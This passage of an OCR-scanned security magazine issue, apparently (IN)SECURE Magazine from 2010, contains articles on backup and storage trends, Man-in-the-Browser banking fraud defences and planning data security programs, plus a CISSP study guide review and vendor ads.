may lead to unforeseen catastrophic failures 
that result in high costs. 



Rafal Los is a web application security evangelist for the HP Software & Solutions business at HP 
(www.hp.com). Los is responsible for bridging industry, customer, and solutions- bridging the gaps between 
security technologies and business needs. Los also demonstrates how HP Application Security Center solu- 
tions can help organizations reduce risk and bring business value through measurable gains in enterprise web 
application security. 
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Are Hackers 

Finding a Way Into 
Your Network? 




GFILANguard 

Award-winning vulnerability management software 

To lower the security risk you need GFI LANguard, a solution that provides network vulnerability scanning, 
patch management and auditing in one integrated package, This award-winning solution allows you to 
scan r detect, assess and rectify vulnerabilities on your network faster and more effectively. 



GFI 



WEB & MAIL SECURITY 
ARCHIVING & FAX 
NETWORKING & SECURITY 



Download your FREE trio! version from www.gf ixomflanrietsean/ 
tel:+1 f»88) 243-4329 | fax: +1 1919) 379-3402 | email: ussales@gfLcom | url: www^gfi.com^lannetscan/ 




How much data do we create? How do we secure it? Store it? Retrieve it? 



When professional community Wikibon re- 
cently translated the amount of digital informa- 
tion that is estimated to be created in 2010 in 
more physical terms, they calculated that to 
store all that data would require 75 billion fully- 
loaded 16 GB Apple iPads. It makes the mind 
reel, doesn't it? 

It was also noted that the amount of digital in- 
formation created today surpasses by 35 per- 
cent the capacity of storage space that is cur- 
rently available, and that the percentage will 
only be getting bigger as the years pass. 

If this statistic and prediction sound too wild to 
be credible, just pause a moment and think 
about how much content you yourself produce 
every day - at home and at work. 

Then multiply that number with the latest 
numbers regarding the estimated number of 
Internet users (it was 1 ,966,51 4,81 6 on June 
30, 2010, by the way). It doesn't sound that 
far-fetched anymore, does it? 



Well, the point that I really wanted make with 
this brief introduction is that the human race 
seems to be pouring out massive amounts of 
data like the world's going to end tomorrow. 

Some of it will vanish into the far reaches of 
this global system of networks that we call the 
Internet, fragments of it stored in various 
places, but for all effective purposes lost be- 
cause it will be unsearchable. And that's all 
right, since most of it wasn't meant to be 
saved anyway. 

But what about the data we do want to save? 
The seemingly inexorable progress of the hu- 
man race is tied closely to our learning capa- 
bilities and the fact that we can access the 
knowledge left to us by our ancestors - 
whether they used stone tablets, books, or 
data storage devices. 

The decisions that we make daily are largely 
based on the information we have at our dis- 
posal. Whether these decisions concern our 
private or business life, we need information. 
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So now we come to the crux of the matter and 
this article - what do we know and what can 
we expect in the future when data storage and 
the backup process are concerned? 

The recently concluded bidding war between 
Dell and HP to acquire 3PAR has put the spot- 
light on the storage sector, and has indicated 
that cloud storage - however omnipresent the 
concept may be currently - is just one of the 
trends that drive this market, and that physical 
data centers are still very much in demand. 

It may be that the time will come when cloud 
storage becomes the mainstream storage 
model, but that still isn't the case. "Cloud stor- 
age definitely solves a major problem - that 
being hardware maintenance," says Adrian 
Gheara, Project Manager, GFI Backup. "Very 
often small companies don't have the re- 
sources for a strong hardware infrastructure 
required by a backup strategy (redundant 



hard-drives, dedicated servers, load balanc- 
ers, an administrator that constantly monitors 
the health of hardware equipment). Cloud 
computing will ensure that for a decent fee 
they get the best possible reliable infrastruc- 
ture for backups." 

Peter Airs, EM EA Storage Product Manager 
for Netgear agrees. He thinks that cloud stor- 
age is ideal for smaller customers without a 
second site to replicate data to. "Cost and 
complexity is massively reduced compared to 
deploying a tape solution and it is a 'set it and 
forget it' solution shifting critical data off site as 
it gets saved locally. And although cloud 
backup like our embedded ReadyNAS Vault is 
not replacement disaster recovery for applica- 
tions, it fits smaller customers looking for 
peace of mind protection for files while ad- 
dressing capital expenditure with a pay-as- 
you-go model." 



IT MAY BE THAT THE TIME WILL COME WHEN CLOUD STORAGE BECOMES 
THE MAINSTREAM STORAGE MODEL, BUT THAT STILL ISN'T THE CASE 



Larger enterprises and mid-size organizations 
can also benefit from the cloud option, even if 
they have already implemented high availabil- 
ity or disk-to-disk backup, thinks Christian Wil- 
lis, EMEA Technical Director for Vision Solu- 
tions. He believes that cloud storage and re- 
covery can complement their existing strategy 
and further reduce recovery time and recovery 
point objectives. 

As regards the matter of data security, he 
says that apart from defining and sticking to 
best practices such as encrypting information 
before it goes off-site and using secure net- 
works to move the data, it is of crucial impor- 
tance to specify what responsibilities the cloud 
provider will take on, and what will remain with 
the company. 

Willis is convinced that the likes of Amazon 
and the other major cloud providers have such 
large estates and established security proce- 
dures that data at rest is protected - the stan- 
dards at which they work are comparable or 
better than those you can achieve as a single 
organization. 



GFI's Gheara believes that the trend that has 
seen many large enterprises moving to cloud 
backups will continue unabated. "Avery im- 
portant advantage of cloud storage is that 
your backup is remote," he says. 

"If there's a fire in the office, the backup will 
not be destroyed or damaged as well. The 
only disadvantage with a cloud-based solution 
is speed. If a restore is needed, the download 
will take some time. In the long term, down- 
loads speeds will go up and costs will go 
down, so cloud backups will become easier 
and better. As to security, encryption and data 
distribution across multiple machines will 
cover these risks." 

What is interesting to note is that when it 
comes to backup, a lot of organizations are 
focused on data protection, and it's often the 
case that the quality and speed of the recov- 
ery process - which is, after all, the reason 
they are doing it in the first place - tends to be 
overlooked. 
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Simplicity and ease of use are also of great 
importance. "Everybody knows how important 
backups are. Yet there are still epic tales of 
people losing all their files, sometimes going 
out of business in the process," muses 
Gheara. 

"The truth is that people are lazy. They know 
they have to backup their data and want to do 
so, but because of the complexity to set up 
and create backups they tend to postpone, or 
avoid doing so. And disasters usually strike 
when you're least prepared. Providing an 
easy-to-understand user-experience is a key 
factor to get people to actually create back- 
ups. With GFI Backup for Business, for exam- 
ple, usability is something we pay particular 
attention to. We are constantly trying to make 
the process simpler and easier." 

Netgear's Airs concurs, especially when it 
comes to small business and mid-sized enter- 
prises. He notes that backup always consists 
of a hardware and software component and it 
is up to vendors to ensure that these compo- 
nents dovetail to provide a cost effective, high 
performance yet trouble free experience for 
the customer. 

Vision Solutions' Willis says that ease of use 
is especially important when it comes to 
backup being deployed across multiple differ- 
ent platforms. "Virtualization has made some 
elements of backup easier, but it has also in- 
troduced some new challenges to consider," 
he says. "As an example, if a company has 
VMware within its main HQ, but is running Mi- 
crosoft Hyper-V in its branch offices for rea- 
sons of cost, then it can have some problems 
in making sure that all its virtual machines are 
properly protected." 

And while Toshiba provides only consumer 
backup solutions, Manuel Camarena, product 
manager at Toshiba' Storage Device Division, 
points out that while the majority of people 
does seem to be aware of the importance of 
regularly backing up their computers, a recent 
survey they sponsored revealed that 54 per- 
cent of them says that they simply forget 
about it. To try to influence that situation for 
the better, they issued a line of portable hard 
disk drives that include pre-loaded backup 
software that has an easy setup process and 
"set-it-and-f orget-it" operation . 



But while ease of use is (predictably) an im- 
portant characteristic of backup solutions 
(business or otherwise), it is definitely not the 
only one on which my interviewers agree. 
When it comes to business backup, a central- 
ized backup management solution also seems 
to be preferred. 

"SMBs have particular resource challenges 
but centralizing into a single easy to manage 
platform that can take care of all of a busi- 
ness's storage and backup needs makes 
sense from a financial and management over- 
head point of view," says Airs. 

He also thinks that when it comes to SMBs, 
they are often relying on backups and disaster 
recovery policies being adhered to by staff 
who's primary function is elsewhere in the 
business, meaning that backups don't get 
done and tapes are not managed correctly, 
and says that many of these issues can be 
addressed by moving to a centralized disk 
storage system and an automated backup re- 
gime which requires minimal human interven- 
tion once set up. 

"For companies with multiple computers it is 
important to have an easy administration 
panel, that allows a centralized management 
of tasks; otherwise it's very likely that prob- 
lems will arise during the backup process and 
nobody will ever know," concurs Gheara. 

According to the results of a recent storage 
study by ThelnfoPro, data de-duplication is a 
leading technology when it comes to backup 
on companies' existing storage resources but, 
interestingly enough, online data de- 
duplication and data reduction appears to be a 
waning technology. 

But what do these experts think about it? 

"Data de-duplication is relevant only for large 
companies. It works very well with cloud stor- 
age for reduced traffic," says Gheara. "In 
small companies, due to the lower volume of 
data that is transferred, de-duplication is not 
really necessary; and may not be a viable op- 
tion because of the need to set up the soft- 
ware and its' cost." 

Airs says that, so far, Netgear's customers 
haven't shown much inclination towards it, 
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and prefer to ride the cost/capacity curve for 
the time being and to employ higher capacity 
storage systems. He thinks that its time will 
come, but that adoption is slower due to the 
lower capacity requirements, time and budget 
pressure in the small business and mid-sized 
enterprise space. 

But to return for a moment to the 75 billion 
fully-loaded 16 GB Apple iPads from the be- 
ginning of the article and the storage issue, 
and mention that Toshiba recently made a 
significant inroad when it comes to a new 
technology that will improve areal disk density 
and allow us to store five times the amount of 
data per inch than we can store today. 

"As perpendicular magnetic recording (PMR) 
- the current HDD industry standard - nears 
its fundamental capacity limit, the industry is 
investigating new technologies to increase 
areal density," says Patty Kim, product man- 



ager at Toshiba's Storage Device Division. 
"Bit-patterned media (BPM) is one approach. 
Two others that hold significant interest are 
heat assisted magnetic recording (HAMR) and 
microwave assisted magnetic recording 
(MAMR). Toshiba is evaluating these ap- 
proaches, all of which have potential technical 
hurdles, but the developments we've made 
with BPM certainly make it a strong contender 
for future production." 

All in all, Toshiba has managed to fabricate a 
hard disk with an areal density of 2.5 terabits 
per-square-inch and a practical servo pattern 
by using an etching mask made of a self as- 
sembled polymer, but they still haven't man- 
aged to read or write data in the drives. Obvi- 
ously, a considerable amount of time will pass 
until this technology becomes a standard, but 
they predict that density of 5Tb/in2 will be 
achievable in the lab by 2012. 



TOSHIBA HAS MANAGED TO FABRICATE A HARD DISK WITH AN 
AREAL DENSITY OF 2.5 TERABITS PER-SQUARE-INCH 



And while Seagate seemed to opt for heat as- 
sisted magnetic recording, and Hitachi GTS 
for the bit-patterned media, so far no drive 
manufacturer has thrown all their eggs in one 
basket. Setting aside the issue of disk density, 
I also wondered if the self-encryption capabil- 
ity of some of Toshiba's drives was becoming 
a strong selling point, and asked if they no- 
ticed an increase in demand. 

"Absolutely. Many customers see them as the 
best - and most cost effective - way to protect 
'data at rest' on PCs and storage systems," 
says Scott Wright, product manager for mobile 
storage with Toshiba's Storage Device Divi- 
sion. "The interest stems not only from the 
desire to protect against the potential data and 
economic loss from a lost or stolen notebook, 
but also from the need for IT departments to 
manage their compliance with privacy laws 
and regulations governing data security. This 
is particularly true for highly regulated enter- 
prises in such industries as health care and 
finance. However, regardless of the type of 
business, the simple fact is that all disk media 



eventually leaves a company's control, 
whether it's decommissioned, disposed of, 
sent for repair, misplaced or stolen." 

And when it comes to drives that are getting 
withdrawn from service and disposed of, To- 
shiba has also thought about and imple- 
mented a wipe technology that provides the 
ability to automatically erase the SED's inter- 
nal security key when the drive's power supply 
is turned off - such as when a system is 
powered-down or when the drive is removed 
from the system - instantly making all data in 
the drive indecipherable. 

In the end, it seems to me that even though 
there are vast amounts of data that must be 
stored, and stored well, the good news is that 
we don't lack in options to choose from. 

There may be glitches here and there, but no 
technology is or ever will be flawless. That is a 
fact that we must accept, and learn to always 
have a (no pun intended!) backup plan. 



Zeljka Zorz is the News Editor for Help Net Security and (IN)SECURE Magazine, 
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Here are some of the Twitter feeds we follow closely and can recommend to anyone interested in 
learning more about security, as well as engaging in interesting conversations on the subject. 

If you want to suggest an account to be added to this list, send a message to @helpnetsecurity 
on Twitter. Our favorites for this issue are: 



@chriseng 

Chris Eng - Senior Director of Security Research at Veracode. 
http://twitter.com/chriseng 



©armorguy 

Martin Fisher - Director of IT Security at WellStar Health System. 
http://twitter.com/armorguy 



@jack_daniel 

Jack Daniel - Community Development Manager for Astaro. 
http://twitter.com/jack_daniel 



@alexeck 

Alex Eckelberry - CEO at Sunbelt Software. 
http://twitter.com/alexeck 
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Not too many years ago, the Internet became a way for people to access their 
banking information and to execute some basic financial transactions. At the 
time, online banking was a relatively safe practice. The threats came largely 
from hackers who were more intent on creating mayhem than committing a 
serious financial crime - in short, a situation that was very different from the 
one we have today. 



It is not surprising that an increase in online 
fraud has mirrored the growth of online bank- 
ing. The early phishing attacks - orchestrated 
largely by "script kiddies" - have evolved into 
sophisticated malware attacks orchestrated by 
organized crime rings. 

Notorious malware, such as the Zeus Trojan, 
capable of eluding many of the solutions put in 
place by financial institutions, has become the 
norm. As Gartner pointed out, "fraudsters have 
definitely proved that strong two-factor authen- 
tication methods that communicate through 
user browsers can be defeated." (See Gart- 
ner: Where Strong Authentication Fails and 
What You Can Do About It, December 2009). 

The Anti-Phishing Working Group (APWG) re- 
cently reported that there 48,244 phishing at- 
tacks occurred across 28,646 unique domain 
names during the first half of 2010. And yet, 



despite those numbers, there was actually a 
decline in the overall number of unique phish- 
ing attacks and domain names when com- 
pared with the numbers from the previous 
year. 

This decline could be attributed to the chang- 
ing tactics employed by the fraudsters. The 
attacks are now more customized - for exam- 
ple, unique numbers are incorporated into the 
URLs in order to track targeted victims, and 
one domain name is used to host multiple 
attacks. 

The decline also coincided with the increase in 
social engineering attacks and the prevalence 
of the Zeus malware. (See Anti-Phishing 
Working Group: Global Phishing Survey: 
Trends and Domain Name Use in 1H2010, 
October 2010). 



www. i nsecu remag .com 



29 



How do these attacks occur? 

The basic rule of an attack is to disrupt the in- 
tended communication between the end users 
and the financial institution - by misdirecting 
them, taking over their user sessions or their 
entire machine. The malware modifies Web 
sessions at will and initiates fraudulent trans- 
actions - all while mimicking a normal session 
and making it next to impossible for the end- 
user to detect the attack. 

Even in instances where an out-of-band One- 
Time Password (OTP) is used, the malware 
can alter the transaction without the user 



being aware, so some form of out-of-band 
transaction verification is required. 

These fraudulent online attacks are constantly 
evolving, often spanning multiple sessions and 
channels. Many of these attacks - like the lat- 
est Man-in-the-Browser attacks - occur after 
the user has been authenticated. This has 
prompted Gartner to observe that strong 
authentication on its own is no longer suffi- 
cient. And as a result, many of the solutions 
once thought to be effective against malware, 
including many put in place by financial institu- 
tions, are no longer effective on their own 
against the latest attacks. 



THESE FRAUDULENT ONLINE ATTACKS ARE CONSTANTLY 
EVOLVING, OFTEN SPANNING MULTIPLE SESSIONS AND 

CHANNELS 



Strategies for success in addressing 
Man-in-the-Browser attacks 

The key to detecting and stopping Man-in-the- 
Browser attacks - or other aggressive malware 
- lies in the ability to understand behavioral 
changes in a user, often before any monetary 
transaction happens. Unusual navigation pat- 
terns and even a different browsing speed can 
be indicators that something is not "right" in 
the session. Without these early indicators, 
transactions may seem fine to the bank 
application. 

Financial institutions need to understand the 
complexity of today's attacks and the value of 
the tools they have available. Organizations 
must take a proactive, layered approach to 
protecting online users, whether individuals or 
businesses. They should implement a three- 
pronged strategy that involves: 

Strong authentication - Recognizing that not 
all transactions are equivalent, organizations 
should deploy a versatile authentication plat- 
form that supports a broad range of authenti- 
cators for strong authentication. There is a 
wide range of options available on the market 
today, including traditional physical options like 
OTP tokens, grid cards, and smart cards, 



which can validate a user's identity more effi- 
ciently. 

While these solutions - on their own - are not 
100% effective against attacks like Man-in-the- 
Browser, they do protect against many attacks 
AND when deployed in conjunction with fraud 
detection, can increase the protection for sen- 
sitive transactions. 

Behavioral and transactional fraud moni- 
toring - This server-side monitoring of a user's 
movement through a banking Web site, includ- 
ing the transaction execution steps and the 
steps leading there, provides flexibility for fi- 
nancial institutions to adapt to constantly 
evolving malware features and helps them 
detect suspicious patterns of activity. 

The modern versions of fraud detection solu- 
tions offer organizations the ability to detect 
and defend against fraud in real-time, across 
applications and channels - a critical capability 
given how fast criminals move. 

Out-of-band transaction verification and 
signature techniques on a mobile applica- 
tion - This technique leverages devices such 
as mobile phones that are already being car- 
ried by the end-users, and enables them to 
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review and verify transaction details outside 
the influence of malware on the user's PC. 

In a case study published earlier this year, 
Gartner detailed how one bank implemented a 
fraud detection solution that captures, moni- 
tors and analyses user session activity, distin- 
guishing between malware and legitimate user 
activity. 

In this report Gartner described how this bank 
saved $1 million over an 18 month period by 
implementing this solution, stopping more than 
40 attempted account takeovers by Zeus 
malware attacks in 2009 alone. (See Gartner 
Research Note, Case Study: Bank Defeats 
Attempted Zeus Malware Raids of Business 
Accounts, March 2010). 



While financial institutions have numerous op- 
tions for addressing online fraud, their imple- 
mentation of these solutions has been slow. 

A solution that detects fraudulent activity in 
real-time and monitors user behavior offers an 
effective approach to combating some of the 
latest malware attacks, resulting in prevention 
of financial loss for banks and businesses. 

This use of behavioral and transactional fraud 
monitoring should be complemented by strong 
2-factor authentication and out-of-band trans- 
action verification and signature for an 
effective layered defense. 



Mike Byrnes, Product Manager at Entrust (www.entrust.com). He has more than 20 years' experience 
in product management with a focus on internet security and business communication systems. He is 
currently responsible for driving the Fraud Detection solutions portfolio at Entrust working with top 
financial institutions around the globe. 
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Book review 
CISSP Study Guide 

by Zeljka Zorz 



Authors: Eric Conrad, Seth Misenar and Joshua Feldman I Pages: 592 I Publisher: Syngress I 



The title of the book is self-explanatory - this is 
a study guide for all of you out there who as- 
pire to become a Certified Information Sys- 
tems Security Professional. 

Mixing facts, knowledge and experience, the 
authors aimed at relaying to you every detail 
they think important when tackling the colos- 
sal task of studying for this demanding exam. 

About the authors 

Eric Conrad is a SANS Certified Instructor and 
is the president of Backshore Communica- 
tions, a company focusing on intrusion detec- 
tion, incident handling, information warfare, 
and penetration testing. 



Joshua Feldman is a contractor working for 
the DoD's Information Systems Agency. Be- 
fore that, he spent time as an IT Sec engineer 
working for the Department of State - he trav- 
elled around the world and conducted security 
assessments of U.S. embassies. 

All three are CISSPs. 

Inside the book 

The book begins with an introductory chapter 
in which the authors explain that the book was 
born out of real-world instruction and experi- 
ence, offer some good advice on how to use it 
to successfully, and how to prepare for and 
execute the exam. 



Seth Misenar is also a SANS Certified Instruc- 
tor and serves as lead consultant for and 
founder of Context Security. He teaches a va- 
riety of courses for the SANS institute, 
including the CISSP course. 



The ten chapters that come next cover the fol- 
lowing subjects: information security govern- 
ance and risk management, access control, 
cryptography, physical security, security archi- 
tecture and design, business continuity and 
disaster recovery planning, telecommunication 
and network security, application development 
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security, operations security, and legal regula- 
tions, investigations and compliance. 

Every chapter begins with a short list of exam 
objectives covered in it and points out and de- 
fines the most important terms and definitions. 
After a short introduction, cornerstone infor- 
mation security concepts are introduced, and 
the authors make sure that you understand 
that without being completely familiar with 
them, you will not be able to pass the exam. 

Throughout the chapters, text boxes contain- 
ing real-world examples and exam warnings 
with hints about what things you really need to 
remember, what information you must not mix 
up, and what the exam questions are really 
aiming for in particular cases. 

There will also be some notes that will provide 
you with links to texts that are not covered in 



the book, but must be learned nonetheless, or 
things to think about. Every chapter finishes 
with a short summary of exam objectives, and 
a self test consisting of 15 questions that 
could come up in the exam. 

Final thoughts 

Perhaps you will look at the number of pages 
this book has and think that this amount is 
nothing when compared with some other 
books designed to teach you all you need to 
know to become a CISSP, but don't be fooled. 

The authors have made it their business to 
gather all the needed knowledge and to pre- 
sent it in an extremely concise, straightforward 
manner, and to give you practical hints that 
could really help you jog your mind when you 
sit down to take the test. 



Zeljka Zorz is the News Editor for Help Net Security and (IN)SECURE Magazine. 
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• Find SQL injection 

• Cross site scripting 

• Google hacking 

& other vulnerabilities with 

Aacunetix 

Web Vulnerability Scanner 



www.acunetix.com 
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data security programs encompass 
rocesses, people, technology 

by Abir Thakurta 




A thorough examination and understanding of the business processes and 
people affected by a new data security program - along with selecting the 
right technology - are the building blocks for a successful outcome. 



Organizations embrace data security for a va- 
riety of reasons, but more often than not, it's 
in response to a data security mandate (like 
the PCI DSS) or privacy law (like the Massa- 
chusetts 201 CMR 17). 

Far too often, the initiative is defined simply 
as "an encryption project" or "a tokenization 
project." These are references that undermine 
the value of establishing an effective data se- 
curity program that goes beyond compliance 
to ensure true data protection day-in and day- 
out throughout the extended enterprise. 

When a data security initiative is assigned to 
the IT department, it is often approached like 
any other IT project. 

Yet, a data security project is very different 
from a traditional IT project. Instead of build- 
ing systems, implementing solutions and cus- 
tomizing software to meet business needs, a 
data security project is about introducing data 



security into existing business systems and 
implementing technologies that reduce risk 
within the organization. A successful data se- 
curity program balances the need for sharing 
data with that of restricting data access to 
remediate security gaps. 

Successful data security projects begin with 
an assessment of the current state of data 
security within an organization. This includes 
fully understanding the processes and people 
that rely on sensitive and confidential informa- 
tion to perform business functions, followed 
by an exploration of available technologies. 

First things first: Key data security imple- 
mentation questions 

Answering the following questions prior to im- 
plementation will provide a solid foundation 
for developing a successful data security 
program: 
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• What data requires protection? 

• What data is unnecessary? 

• What data should be segregated? 

• Who currently has access to sensitive data? Do they really need access? 

• Who will require access to sensitive data in the future? 

• Will a data vault reduce the data footprint? 

• Can the business systems work with encrypted data? 

• Can the business systems work with surrogate (tokenized) data? 

• Will systems require any modification to work with protected data? 

• Will performance be optimal to support business needs? 

• Can a data security framework be built to support the business as a service? 

• Will data tokenization meet business needs? 

• Will introducing tokenization or encryption technology reduce the risk of data exposure? 



Data security implementation challenges 

Organizations typically experience three types 
of challenges when implementing a new data 
security program: process challenges, people 
challenges and technology challenges. 

Challenge #1: Processes 

The most common process challenges that 
organizations encounter are getting a handle 
on where sensitive data exists throughout the 
enterprise; identifying which business proc- 
esses use sensitive data and evaluating 
whether surrogate data can be substituted for 
sensitive information; and defining a data 
protection strategy. 

1. Know the sensitive information foot- 
print. Many organizations do not have a data 
classification program or know where their 
sensitive information resides. Absence of a 
holistic picture results in islands of data pro- 
tection that can be challenging to manage and 
standardize. It also increases the cost of on- 
going compliance and management of these 
solutions. It is vital to generate a sensitive in- 
formation footprint so that an appropriate data 
protection strategy can be defined and ap- 
plied. Identify business processes that will be 
impacted as a part of data remediation, such 
as the payment process, the order-to-cash 
process, the procure-to-pay process, etc. This 
exercise has the added value of revealing the 
people who will be impacted by the new pro- 
gram and the process owners. Process own- 
ers need to be brought into the data security 
program early to collaborate on how to incor- 
porate data remediation techniques like en- 



cryption or tokenization with the least disrup- 
tion. 

2. Identify aspects of a business process 
that can function with surrogate data. 

Working with the process owner and other 
members of the cross-functional team, identify 
aspects of the process that can be handled 
with encrypted or surrogate data. Empirical 
evidence based on past experience suggests 
that 60 to 70 percent of activities related to 
many management, operational and support- 
ing processes do not require sensitive data. In 
these instances, surrogate data, or tokens, 
can be used. Although introducing changes to 
existing processes and requesting business 
owners to work with surrogate data can be 
challenging, the benefits outweigh any initial 
issues. For example, substituting surrogate 
data for credit card numbers takes applica- 
tions, databases and systems out of scope for 
Payment Card Industry Data Security Stan- 
dard (PCI DSS) audits, reducing the cost of 
annual audits. Typically, the output of this step 
should be a process deliverable that repre- 
sents a Process Flow Diagram. 

3. Define a data protection strategy. Tradi- 
tionally, organizations have viewed security as 
network or perimeter security. With the prolif- 
eration of internal breaches, organizations are 
beginning to understand the need to protect 
data at the source. Tactical fixes like encrypt- 
ing data in one database, without developing 
an enterprise data protection strategy, can 
cause issues in the long run. It's important to 
develop a data protection strategy that aligns 
with the business needs before implementa- 
tions are conducted. 
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Challenge #2: People 

One of the most challenging aspects of rolling 
out a new data security program is handling 
objections from the people who are impacted 
by new policies. To some employees, no 
longer having the ability to work with sensitive 
data is akin to having privileges taken away. 

In response, some may decide to employ 
workarounds that increase the risk of data 
breach or data leakage. For example, an em- 
ployee might access the sensitive data and 
reveal it to others inside or outside the organi- 
zation by emailing it or just writing it on a 
piece of paper. 

Therefore, it is imperative to prepare those 
who will be impacted through open communi- 
cation, data security training and ongoing 
education to prevent unauthorized access, 
use, misuse, disclosure, destruction, modifica- 
tion or disruption of data. Here is a quick 
overview of a proven approach: 

1. Begin at the top. As with any initiative, ex- 
ecutive sponsorship is important for a data 
security program. It is imperative that the 
message comes from the top. Getting the CIO 
or CFO engaged early in the project is impor- 
tant, but only after all of the process and 
technology challenges have been identified. 

2. Identify people who have access to sen- 
sitive data. Working with the process deliver- 
able, identify people (and their activities) that 
have access to sensitive data. Putting to- 
gether a stakeholder accountability matrix will 
help define who is responsible for handling 
sensitive data and who could work just as ef- 
fectively with an encrypted or a surrogate 
value. 

Pay more attention to people who will not 
have access to sensitive data when the data 
protection program goes into effect. 

3. Develop a category of users called 
"Privileged Users." Anyone who will con- 
tinue to work with locked down data after the 
new data security program is in place be- 
comes a "privileged user." Obtaining a "privi- 
leged user" credential should require a set of 
criteria to be met, including establishing ways 
that employees can be granted this designa- 



tion and under which circumstances privileges 
can be revoked. Applying the principle of least 
privilege to users accessing sensitive data 
should help create a defense-in-depth strat- 
egy that can work to counter threats. 

4. Incorporate data security into the secu- 
rity policy. Adding a data security component 
to the security policy helps formalize the pro- 
gram. Include a data classification program 
that has been designed to support the "need 
to know" principle. This also allows for users 
to be educated on different data types - confi- 
dential, sensitive, restricted, public, etc. - 
within the organization. 

5. Add an acceptable data use policy to the 
organization's acceptable use policy. This 
will ensure that privileged users are bound by 
governing rules and sanctions around the 
management and processing of data. This 
also creates a policy within the organization 
that can be regularly mandated and audited. 
In the event that a policy violation occurs, the 
organization can appropriately withdraw 
access to data. 

6. Educate and train. Raising awareness of 
privacy issues within the organization is an 
important step toward the execution of a suc- 
cessful data protection program. This should 
be handled by educating stakeholders on why 
reducing risk is important to the business. 

Awareness training educates both privileged 
and business users on the appropriate use, 
protection and security of sensitive data within 
the organization. 

It also helps people understand their individ- 
ual user responsibilities around data privacy, 
such as confidentiality, integrity and availabil- 
ity of data assets. Training should enhance 
user awareness, increase security, achieve 
compliance and improve productivity for the 
business. Introduce the data security program 
using internal communications and promo- 
tions, and consider hiring a professional 
trainer. 

New employee Security Awareness Training 
programs and periodic refresher courses can 
also be administered online using third-party 
professional services. 
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Challenge #3: Technology 

The third major challenge of implementing a 
successful data protection program is select- 
ing the right technology for the various types 
of sensitive data that needs to be protected. 
This is especially critical for PCI DSS compli- 
ance, where encryption and key management 
are required. 

Packaged data security solutions for encryp- 
tion, tokenization and key management of- 
fered by specialized, best-of-breed data secu- 
rity suppliers will provide greater value and 
future-proofing than custom-made or 
internally-developed solutions. 

The biggest benefit in using commercial, off 
the shelf (COTS) products is the associated 
benefits derived from having the supplier 
maintain the products for ongoing compliance. 
Custom-made applications will always be 
open to scrutiny during audits and require ad- 
ditional investment for maintaining compli- 
ance. 

COTS solutions should support open stan- 
dards for interoperability - another future- 
proofing requirement. Technology solutions 
built on open standards like web services and 
Java Cryptographic Extensions can be inte- 
grated with similar conforming technology in 
an existing IT infrastructure. Packaged solu- 
tion providers must assure that their solutions 
encompass new standards as they emerge 
and become accepted by the industry. 

Delegating the monitoring and enablement of 
new standards is an important part of the 
value proposition. For example, there are 
several initiatives underway to establish stan- 
dards for key management. It will be a while 
before they solidify, but it's important to select 
a solution supplier that has demonstrated the 
ability and desire to support standards. 

Solutions must be designed for architectural 
flexibility and scalability to accommodate fu- 
ture needs, such as new personally identifi- 
able information (Pll) use cases (even if they 
are not part of the original technology justifica- 
tion) as well as new standards. 

In addition to future-proofing your data secu- 
rity technologies by selecting the right tech- 



nology and vendor partner, most organiza- 
tions also face these technology challenges: 

1. Refining data models. Typically, organiza- 
tions try to protect data by encrypting the data 
set wherever it resides within the organiza- 
tion. However, a data protection strategy does 
not always require encryption. It could be as 
simple as getting rid of the data. That can be 
achieved by refining data models, consolidat- 
ing data sets, aggregating data and replacing 
data with surrogate data. 

Data models can be refined and data sets can 
be optimized without impacting business sys- 
tems. Consider using a third-party data secu- 
rity expert or relying on a trusted technology 
vendor for assistance. 

2. Optimizing systems for performance 
with encryption. Encryption is performance 
intensive. As such, performance optimization 
is very important. Every application that works 
with encrypted data has to be reviewed, 
tested and performance tuned. This is han- 
dled during the implementation project. 

3. Data migration. One of the biggest chal- 
lenges for an organization pursuing data pro- 
tection is to establish a data migration strat- 
egy. This is important for business continuity 
because the transition of systems that contain 
sensitive data to a protected state needs to be 
analyzed, designed, tested and executed. 

Additionally, the priority of migration sequence 
for business systems across the enterprise 
where encryption or tokenization is being in- 
troduced has to be analyzed and accounted 
for. Initial encryption and tokenization strate- 
gies are an important aspect of the design 
that is often neglected. 

4. Build flexibility into the overall data pro- 
tection solution to anticipate future data 
protection needs. Often customers request 
tactical fixes to protect data of a particular 
type. However, working with the assumption 
that any data set can be protected by the so- 
lution is a key aspect of data protection de- 
sign. This ensures that the data protection so- 
lution can be leveraged in the future to protect 
additional data sets, thus maximizing the 
investment made. 
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Six key steps to a successful data security 
program 

Deploying an enterprise-wide data protection 
strategy in a heterogeneous environment re- 
quires a proven methodology for success. 
Real-world experience indicates that the fol- 
lowing six steps are critical to a successful 
data security program: 

1. Classify sensitive information through a 
data management and classification program. 
In other words, identify which data needs to 
be protected. 

2. Develop a sensitive information footprint 
within the enterprise. Identify where sensitive 
data gets acquired, processed, viewed, modi- 
fied, updated, added, transmitted, stored, ar- 
chived and destroyed. A sensitive information 
flow with impacted systems can be very 
beneficial in this stage. 

3. Design a data protection strategy that bal- 
ances the need for access to information by 
the business with the requirement to protect it, 
with the aim being to minimize exposure and 
overall risk. This strategy usually employs a 
combination of one or many of the following 
remediation techniques: 

a. Get rid of sensitive data that is not needed 
to run the business. For example, it may be 
determined that storing credit cards is not 
necessary. 

b. Define a policy of least privileges and need 
to know. Studies indicate 60 to 70 percent of 
business processes and associated users 
may not need the sensitive data. 

c. Segregate the data using a "Chinese" wall 
to reduce the risk of data inference. 

d. Rely on traditional methods of network 
segmentation and defense in depth to prevent 
traditional hacks. 

e. Prevent data leaks and data diddling. 

f. Leverage the latest innovations in data pro- 
tection, including pervasive encryption, to- 
kenization and key management. 

4. Execute data protection strategies in 
phases to transition from a state of high expo- 
sure to one of controlled risk, and potentially 
for compliance with mandates like PCI DSS. 

5. Educate employees and management on 
the benefits of a sound data protection strat- 



egy as a part of the organization's change 
management process. 

6. Maintain an ongoing data security program 
that ensures continuous protection and com- 
pliance throughout the extended enterprise. 

Key data security program success criteria 

Most data protection projects involve multiple 
teams and require collaboration among differ- 
ent business functions - most often IT, secu- 
rity, compliance and finance. While each busi- 
ness function has its own performance met- 
rics, a set of key success criteria for data se- 
curity projects has emerged: 

• Impact to business 

• Reduction in the sensitive data footprint 

• Managing the cost of ongoing compliance 
(for mandate-driven projects) 

• Ease of implementation of data protection 
strategy 

• Ease of integration with existing business 
systems 

You don't have to do it all: Seek vendor 
experience 

Implementing a data security program is a 
complex assignment encompassing proc- 
esses, people and technology. It requires a 
comprehensive upfront assessment of the or- 
ganization's entire data security landscape 
and may lead to subtle changes to business 
processes that affect how employees do their 
